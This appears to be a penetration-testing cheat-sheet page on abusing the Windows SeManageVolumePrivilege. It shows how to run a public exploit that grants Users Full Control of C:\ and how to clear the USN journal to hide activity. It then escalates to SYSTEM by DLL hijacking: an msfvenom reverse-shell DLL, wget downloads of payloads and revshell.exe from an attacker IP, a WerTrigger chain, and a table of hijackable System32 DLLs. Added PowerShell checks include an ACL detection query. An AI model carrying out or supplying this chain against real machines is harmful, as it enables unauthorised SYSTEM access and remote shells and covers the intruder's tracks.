SeManageVolume

The SeManageVolumePrivilege (listed as "Perform volume maintenance tasks" by whoami /priv, also called Manage Volume) grants low-level control over NTFS volumes. One consequence is the ability to delete the Update Sequence Number (USN) change journal, the per-volume record of every file and directory change that forensic tools and backup software rely on; clearing it erases that history and makes post-exploitation activity harder to reconstruct. By default only Administrators hold the privilege, so finding it in the token of a service or application account is what makes it interesting.

More importantly, the privilege can be abused to gain write access to the entire volume. SeManageVolumeExploit, a public PoC, uses it to rewrite the permissions on C:\ so that BUILTIN\Users is granted Full Control, inherited by every file and directory below the root. In practice this turns the privilege into an arbitrary file write as a plain local user, including into C:\Windows\System32.

# Check permissions. "Disabled" means the privilege is held but not currently enabled;
# the exploit enables it itself (AdjustTokenPrivileges), so only its absence rules the technique out.
> whoami /priv

Privilege Name                Description                      State
============================= ================================ ========
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled

# Run the exploit
> .\SeManageVolumeExploit.exe

# Check volume permissions: BUILTIN\Users now has Full Control, inherited by all subfolders (CI) and files (OI)
> icacls c:\
c:\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(F)
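As an added example (not code from the original page or from SeManageVolumeExploit), the following PowerShell checks the precondition for the technique and the two things the exploit leaves behind: a non-admin Full Control ACE on the volume root and a writable System32. The function names are my own; the expected BUILTIN\Users Full Control entry is taken from the icacls output above.

```powershell
# Added example, not from the original page or the SeManageVolumeExploit project.
# Run from the low-privileged shell before and after the exploit.

function Test-SeManageVolumePrivilege {
    # whoami /priv lists every privilege held by the token, enabled or not. "Disabled"
    # only means it is not currently enabled; the exploit turns it on itself with
    # AdjustTokenPrivileges, so only a missing entry rules the technique out.
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    $entry = $privs | Where-Object { $_.'Privilege Name' -eq 'SeManageVolumePrivilege' }
    if (-not $entry) { return 'absent' }
    return $entry.State       # 'Enabled' or 'Disabled'
}

function Get-VolumeRootFullControl {
    param([string]$Root = 'C:\')
    # Allow ACEs granting FullControl on the volume root to anyone other than the
    # principals that hold it on a default install (SYSTEM, Administrators and the
    # inherit-only CREATOR OWNER entry). After the exploit, BUILTIN\Users shows up here.
    $expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')
    (Get-Acl -Path $Root).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.FileSystemRights.ToString() -match 'FullControl' -and
            $_.IdentityReference.Value -notin $expected
        } |
        Select-Object IdentityReference, FileSystemRights, InheritanceFlags, PropagationFlags
}

function Test-System32Write {
    # The check that matters for the DLL hijacks that follow: can this token create a
    # file in System32? Uses a random name and removes the probe again.
    $probe = Join-Path $env:SystemRoot ('System32\{0}.tmp' -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($probe, 'probe')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

"SeManageVolumePrivilege: $(Test-SeManageVolumePrivilege)"
Get-VolumeRootFullControl | Format-Table -AutoSize
"System32 writable:       $(Test-System32Write)"
```

On the defensive side, the ACL query is the artifact worth hunting for across hosts: a Full Control ACE for Users or Authenticated Users on a volume root does not appear on a default install.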

Once the volume is writable, a shell as a more privileged account can be gained by DLL hijacking: plant a DLL where a higher-privileged process will load it. The tzres.dll route below lands as NT AUTHORITY\NETWORK SERVICE (that account holds SeImpersonatePrivilege, so a Potato-style impersonation attack covers the last step to SYSTEM); the phoneinfo.dll route lands directly as SYSTEM. For example, tzres.dll can be used to hijack the WMI component that systeminfo queries.

# Create a malicious DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o tzres.dll

Dropping the DLL at C:\Windows\system32\wbem\tzres.dll and running systeminfo loads it from that directory, executing the payload as NT AUTHORITY\NETWORK SERVICE rather than as the calling user (wget is the Windows PowerShell alias for Invoke-WebRequest; -O maps to -OutFile).

> wget http://192.168.45.241:443/tzres.dll -O c:\windows\system32\wbem\tzres.dll
> systeminfo

Alternatively, phoneinfo.dll can be planted in System32 and loaded by Windows Error Reporting, which runs as SYSTEM. WerTrigger forces that load with a crafted Report.wer; the planted DLL and a staged reverse shell do the rest:

> wget http://192.168.45.241:443/phoneinfo.dll -O c:\windows\system32\phoneinfo.dll
> wget http://192.168.45.241:443/Report.wer -O Report.wer
> wget http://192.168.45.241:443/WerTrigger.exe -O WerTrigger.exe
> wget http://192.168.45.241:443/revshell.exe -O revshell.exe
# Report.wer and WerTrigger.exe must be in the same directory; the DLL is loaded as SYSTEM
> .\WerTrigger.exe
c:\users\public\revshell.exe

Other DLLs that common Windows binaries load, usable as hijack targets once C:\ is writable. Two caveats: a hijack only gains something if the binary is run by a more privileged principal than you (a service, a scheduled task, an administrator's session), and several of the listed DLLs already exist in the drop location (msvcrt.dll is even a KnownDLL), so planting them means overwriting a real system DLL rather than filling a missing entry in the search path. Check before dropping.

Binary           DLL(s) to hijack                          Drop location
---------------  ----------------------------------------  --------------------------
systeminfo.exe   tzres.dll, wbemcomn.dll                   C:\Windows\System32\wbem\
taskmgr.exe      UIAutomationCore.dll                      C:\Windows\System32\
eventvwr.exe     mmc.dll, wevtapi.dll                      C:\Windows\System32\
notepad.exe      dbghelp.dll, msvcrt.dll                   C:\Windows\System32\
perfmon.exe      perfts.dll, perfc009.dll                  C:\Windows\System32\
wmic.exe         fastprox.dll, wbemcomn.dll, wmiprvsd.dll  C:\Windows\System32\wbem\
winmgmt.exe      fastprox.dll, wbemcomn.dll                C:\Windows\System32\wbem\
mstsc.exe        rdpencom.dll, tsres.dll                   C:\Windows\System32\
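As an added example (not code from the original page), the following PowerShell triages the targets in the table above for the two conditions a real hijack needs: the DLL must be absent from the drop location (otherwise "dropping" it overwrites a genuine system DLL), and it must not be a KnownDLL (those are mapped from the \KnownDlls section regardless of the loader's search path). The $targets list is a constructed copy of the table and the function names are my own.

```powershell
# Added example, not from the original page. Triage of DLL hijack candidates.

# Constructed copy of the table above.
$targets = @(
    @{ Binary = 'systeminfo.exe'; Dlls = 'tzres.dll', 'wbemcomn.dll';                   Dir = "$env:SystemRoot\System32\wbem" }
    @{ Binary = 'taskmgr.exe';    Dlls = 'UIAutomationCore.dll';                        Dir = "$env:SystemRoot\System32" }
    @{ Binary = 'eventvwr.exe';   Dlls = 'mmc.dll', 'wevtapi.dll';                      Dir = "$env:SystemRoot\System32" }
    @{ Binary = 'notepad.exe';    Dlls = 'dbghelp.dll', 'msvcrt.dll';                   Dir = "$env:SystemRoot\System32" }
    @{ Binary = 'perfmon.exe';    Dlls = 'perfts.dll', 'perfc009.dll';                  Dir = "$env:SystemRoot\System32" }
    @{ Binary = 'wmic.exe';       Dlls = 'fastprox.dll', 'wbemcomn.dll', 'wmiprvsd.dll'; Dir = "$env:SystemRoot\System32\wbem" }
    @{ Binary = 'winmgmt.exe';    Dlls = 'fastprox.dll', 'wbemcomn.dll';                Dir = "$env:SystemRoot\System32\wbem" }
    @{ Binary = 'mstsc.exe';      Dlls = 'rdpencom.dll', 'tsres.dll';                   Dir = "$env:SystemRoot\System32" }
)

function Get-KnownDlls {
    # The configured KnownDLLs list. The loader's live \KnownDlls set also contains the
    # static dependencies of these, so a DLL absent here is still not guaranteed hijackable.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Name -notlike 'DllDirectory*' } |
        ForEach-Object { $_.Value.ToString().ToLower() }
}

function Test-HijackCandidate {
    param([string]$Dir, [string]$Dll, [string[]]$KnownDlls)
    if ($Dll.ToLower() -in $KnownDlls) { return 'KnownDLL: not hijackable' }
    if (Test-Path -LiteralPath (Join-Path $Dir $Dll)) { return 'exists: would overwrite a system DLL' }
    return 'missing: plantable (confirm the binary searches here, e.g. with Procmon)'
}

$known = Get-KnownDlls
$report = foreach ($t in $targets) {
    foreach ($dll in $t.Dlls) {
        [pscustomobject]@{
            Binary = $t.Binary
            Dll    = $dll
            Drop   = Join-Path $t.Dir $dll
            Status = Test-HijackCandidate -Dir $t.Dir -Dll $dll -KnownDlls $known
        }
    }
}
$report | Format-Table -AutoSize
```

The script says nothing about who runs the binary: a DLL loaded by notepad.exe in your own session gains no privilege. The value of an entry marked plantable comes from a process that loads it under a service account, a scheduled task, or an administrator's session, as the tzres.dll and phoneinfo.dll chains above do.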
